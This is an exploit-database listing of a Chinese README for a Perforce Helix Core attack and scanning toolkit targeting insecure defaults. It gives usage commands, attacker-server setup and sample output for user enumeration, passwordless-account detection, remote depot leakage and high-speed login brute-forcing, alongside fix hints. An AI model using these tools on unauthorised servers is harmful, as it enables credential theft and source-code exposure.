Sploitus

Exploit for p4wned

kitploit · 2026-08-24

Exploit Code

MARKDOWN385 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-FLYINGLLAMA87-P4WNED
# P4WNED (CVE-2026-6043)

针对 Perforce (Helix Core) 的安全研究工具与 Nuclei 模板。

**研究文章:** https://morganrobertson.net/p4wned/

请阅读以上文章获取完整详情。

> 仅限授权目标使用。请仅在你自己的服务器上或获得明确书面许可后使用。

**目标受众:** Perforce 服务器管理员、渗透测试人员、安全工程师

**2026年5月更新:** Perforce 2026.1 已发布。此版本默认采用安全配置!非常高兴看到此版发布以保护开发者知识产权。在此了解更多。

注意:这些工具扫描的是由 CVE-2026-6043 导致的配置错误。

* * *

## 要求

工具| 要求  
---|---  
`p4wned.py`| Python 3,`p4` CLI 二进制文件(见下文)  
`p4ghost.py`| Python 3,`p4` CLI 二进制文件,本地 `p4d` 实例(见下方配置)  
`p4-auth-hammer`| g++,Perforce C++ API,OpenSSL 1.1.1(见 `p4-auth-hammer/README.md`)  
JavaScript 工具| Node.js(无外部依赖)  
Nuclei 模板| Nuclei v3+  
Metasploit 模块| Metasploit Framework  
  
**获取`p4` 二进制文件**(`p4wned.py` 和 `p4ghost.py` 需要):

root@kitploit:~
    
    
    # 受 Perforce 使用条款约束:https://www.perforce.com/legal
    wget https://ftp.perforce.com/perforce/r25.2/bin.linux26x86_64/p4
    chmod +x p4
    

* * *

## 背景

Perforce 服务器暴露自定义二进制 TCP 协议(默认端口 1666)。许多安装默认配置不安全——未经身份验证即可列出用户、泄露服务器信息、可访问远程仓库、无密码要求、登录尝试无速率限制。这里的所有工具无需凭据即可利用这些默认配置。

* * *

## 工具

### p4wned.py — 全面安全扫描器

主要扫描器。使用 `p4` CLI 二进制文件枚举用户、测试凭据、列出仓库并生成报告。

root@kitploit:~
    
    
    python3 p4wned.py [-brute] [-audit] [-parallel N]
    

**选项:**

标志| 描述  
---|---  
`-brute`| 启用暴力破解模式——针对所有发现的用户账户测试密码  
`-audit`| 彻底审计模式——即使发现漏洞也继续测试所有用户  
`-parallel N`| 并行密码尝试次数(默认:1)  
  
**配置** (在脚本顶部编辑):

**功能:**

  * 检测 ASCII 或 Unicode 服务器模式
  * 枚举用户(如果 `run.users.authorize=0`)
  * 测试空密码和已知/常见凭据
  * 列出仓库名称并抽样显示最近的文件路径
  * 检查已沦陷账户的 `super` 组成员资格
  * 输出结构化文本报告



**控制台输出:**

root@kitploit:~
    
    
    $ python3 p4wned.py
    
                       ___ _  _  __    __    __  __  ___ 
                      / _ \ || |/ / /\ \ \/\ \ \/__\/   \
                     / /_)/ || |\ \/  \/ /  \/ /_\ / /\ /
                    / ___/|__   _\  /\  / /\  //__/ /_// 
                    \/       |_|  \/  \/\_\ \/\__/___,'  
    
    P4WNED - 0wning P4 servers via shit security defaults since Y2K+25
    
     · Sniffs out user accounts, blank passwords, weak creds, and dumb settings.
     · Confirms depots access and those juicy "super" user accounts.
     · Drops a tidy report so you can fix the mess before the Skids arrive
    
    Authorised targets only, brotendo. Use on your own servers or at your own risk.
    ==============================================================================
    
    
    === Processing: 192.0.2.10:1666 (perforce.example-studio.com) ===
    
    [INFO] Testing user 'super' for security issues...
    [INFO] User 'super' does not exist.
    
    [INFO] Users listing accessible: build, designer1, jsmith, lead_prog, svc_build
    
    [INFO] Testing user 'build' for security issues...
    [INFO] Testing user 'designer1' for security issues...
    [INFO] Testing user 'jsmith' for security issues...
    [INFO] Testing user 'lead_prog' for security issues...
    [INFO] Testing user 'svc_build' for security issues...
    
    [INFO] Added new credential for 192.0.2.10:1666: user='svc_build', password='None'
    [INFO] Saving updated credentials after finding valid credentials for svc_build on 192.0.2.10:1666
    
    [INFO] Report saved to perforce-report-p4wned-1775436520.txt
    

**报告文件** (`perforce-report-p4wned-*.txt`):

root@kitploit:~
    
    
    Perforce Security Scan Report
    
    Server: 192.0.2.10:1666 (perforce.example-studio.com)
      Status: Insecure
      Note: Insecure via user 'svc_build' (no password)
    
      == Depots ==
    Depot depot 2025/11/03 local depot/... 'Default depot'
    Depot assets 2024/08/19 local assets/... 'Asset depot'
    
      == Last 10 Changes ==
    Change 1047 on 2025/11/03 14:22:11 by lead_prog@DESKTOP-BUILD01
    
            Merge branch feature/ai-pathfinding
    
    Change 1046 on 2025/11/03 09:44:38 by designer1@DESKTOP-ART02
    
            Updated character rig exports
    
      == Depot Details ==
    
      Depot: depot
        -- Root Directories --
        //depot/Source
        //depot/Content
        //depot/Config
        This depot is a non-Unreal Engine Depot.
    
    ------------------------------------------------------------
    
    Summary Report
    
    Server: 192.0.2.10:1666 - Insecure - Note: Insecure via user 'svc_build' (no password)
    

* * *

### p4ghost.py — 远程仓库扫描器

通过隐藏的 `remote` 用户测试未经身份验证的远程仓库访问。漏洞利用原理是在本地运行一个攻击者控制的 `p4d` 实例——目标服务器在服务器间协议过程中会回连到此实例,从而泄漏其仓库文件列表。

**一次性配置:**

root@kitploit:~
    
    
    # 受 Perforce 使用条款约束:https://www.perforce.com/legal
    wget https://ftp.perforce.com/perforce/r24.2/bin.linux26x86_64/p4d
    wget https://ftp.perforce.com/perforce/r25.2/bin.linux26x86_64/p4
    chmod +x p4d p4
    
    # 在端口 1818 上启动一个纯 ASCII 的 p4d(用作攻击者服务器)
    mkdir p4root_attacker
    ./p4d -r ./p4root_attacker -p 1818 -d
    
    # 在另一个端口(1819)上启动一个 Unicode 的 p4d,用于 Unicode 目标
    mkdir p4root_attacker_unicode
    ./p4d -r ./p4root_attacker_unicode -xi   # 转换为 Unicode 模式
    ./p4d -r ./p4root_attacker_unicode -p 1819 -d
    

root@kitploit:~
    
    
    python3 p4ghost.py <input_file> [-skipnolicense] [-report FILE] [-p4cmd PATH]
                       [-unicodeport PORT] [-nonunicodeport PORT] [-timeout SECS]
    

root@kitploit:~
    
    
    # 使用上述本地攻击者服务器的示例调用
    python3 p4ghost.py targets.txt -nonunicodeport 1818 -unicodeport 1819
    

**参数:**

**受影响版本:** 所有低于 2025.1 且 `security < 4`(默认值为 0)的版本。

* * *

### p4-auth-hammer — 暴力破解 PoC(C++)

概念验证工具,证明当 `security < 3` 时,`p4d` 未能有效限制认证尝试速率。使用 Perforce C++ API 可针对单个账户实现每分钟超过 300,000 次登录尝试。

root@kitploit:~
    
    
    ./p4_auth_hammer_poc <server:port> <username> <password_file> [-ticketauth]
    

**构建** (需要 Perforce C++ API 和 OpenSSL 1.1.1——完整配置见 `p4-auth-hammer/README.md`):

root@kitploit:~
    
    
    bash p4-auth-hammer/p4_auth_hammer_poc_build.sh
    

**模式:**

  * 默认:直接密码认证(`security < 3`)。完全绕过速率限制。>300,000 次/分钟尝试。
  * `-ticketauth`:基于票据的登录(`security >= 3`)。此级别下速率限制(`dm.user.loginattempts`)生效。



自动检测 SSL 和 Unicode 服务器。自动调整线程数以获得最大吞吐量。

**修复方法:** `p4 configure set security=3`(或 4)。完整详情见 `p4-auth-hammer/README.md`。

* * *

## JavaScript 工具

独立的 Node.js 脚本。除 Node.js 标准库外无其他依赖。所有脚本自动检测 SSL 或纯 TCP、ASCII 或 Unicode 服务器模式——无需标志。

**目标文件格式:** 每行 `host:port`,若省略端口则默认为 1666。以 `#` 开头的行被忽略。

root@kitploit:~
    
    
    p4testascii.example.net:1666
    p4testunicode.example.net:1666
    p4testunicode.example.net:1667
    

**自动检测:** 首先尝试纯 TCP 连接。如果服务器返回 Perforce SSL 错误消息(`"Failed client connect, server using SSL"`),则使用 TLS 重试连接,并设置 `rejectUnauthorized: false`(接受自签名证书)。首先尝试 ASCII 模式;如果服务器返回 Unicode 错误消息,则使用 `unicode` 参数重试连接。

* * *

### perforce-users.js — 用户枚举

利用 `run.users.authorize=0`(默认设置)无需身份验证即可列出所有用户账户。

root@kitploit:~
    
    
    node javascript/perforce-users.js [targets_file]
    

输出:`[host:port] [tcp|ssl] username <email> "Full Name"`

* * *

### perforce-info.js — 服务器信息泄露

利用 `dm.info.hide=0`(默认设置)提取服务器版本、内部地址、根路径和许可证字符串。

root@kitploit:~
    
    
    node javascript/perforce-info.js [targets_file]
    

输出:

root@kitploit:~
    
    
    [host:port] [tcp|ssl]
      Version    : P4D/LINUX26X86_64/2024.2/2877946
      Server Addr: internal-hostname:1666
      Server Root: /opt/perforce/p4root
      License    : Acme Corp
    

* * *

### perforce-passwordless.js — 无密码账户检测

查找未设置密码的用户账户。使用标记化输出格式(`tag` 参数)检测用户记录中是否缺少 `Password` 字段。无密码账户允许直接未经身份验证的登录。

root@kitploit:~
    
    
    node javascript/perforce-passwordless.js [targets_file]
    

输出:`[host:port] [tcp|ssl] [PASSWORDLESS] username <email> "Full Name"`

* * *

### perforce-remote.js — 远程仓库文件枚举

通过隐藏的 `remote` 用户利用 `rmt-DbPipe` 服务器间 RPC 直接读取 `db.rev` 表,无需身份验证即可提取仓库文件路径和变更编号。受影响版本:低于 2025.1 且 `security < 4`。

root@kitploit:~
    
    
    node javascript/perforce-remote.js [targets_file]
    

输出:

root@kitploit:~
    
    
    [host:port] [tcp|ssl] 42 file(s) in depot:
      [change=7] [2024-11-03] //depot/src/main.cpp
      [change=3] [2024-09-12] //depot/config/database.yml
    

* * *

### perforce-keys.js — 全局键枚举

从 Perforce 服务器提取全局键/计数器值。键可能包含构建编号、内部版本字符串和配置信息。

root@kitploit:~
    
    
    node javascript/perforce-keys.js [targets_file]
    

输出:`[host:port] [tcp|ssl] keyname = value`

* * *

## Nuclei 模板

用于 Nuclei 的模板。所有模板均使用 TCP 门控步骤确认 Perforce 服务器存在后再执行 JavaScript 载荷。模板使用与 JavaScript 工具相同的自动检测方法。

root@kitploit:~
    
    
    nuclei -t nuclei-templates/ -u target:1666
    nuclei -t nuclei-templates/ -l targets.txt
    

### 检测

模板| ID| 描述  
---|---|---  
`perforce-detect.yaml`| `perforce-detection`| 通过二进制协议握手检测 Perforce 服务器。严重级别:信息。  
  
### 漏洞模板

**限制:** 不支持 SSL,仅端口 1666。更多功能请参见 JavaScript 工具。

* * *

## Metasploit 模块

三个辅助扫描器模块,适用于 Metasploit Framework ,以及一个处理 Perforce 二进制协议的共享库混入模块。这些模块涵盖与上述独立工具相同的漏洞——用户枚举、无密码账户检测和远程仓库利用。

所有模块自动检测 ASCII 或 Unicode 服务器模式。支持 SSL。

模块| 描述  
---|---  
`auxiliary/scanner/perforce/perforce_user_enum`| 未经身份验证的用户列表——提取用户名、邮箱、全名和最后访问时间。  
`auxiliary/scanner/perforce/perforce_passwordless`  
  
源文件位于 `metasploit/` 目录。已向 Metasploit Framework 提交 PR。

* * *

**修复快速参考:**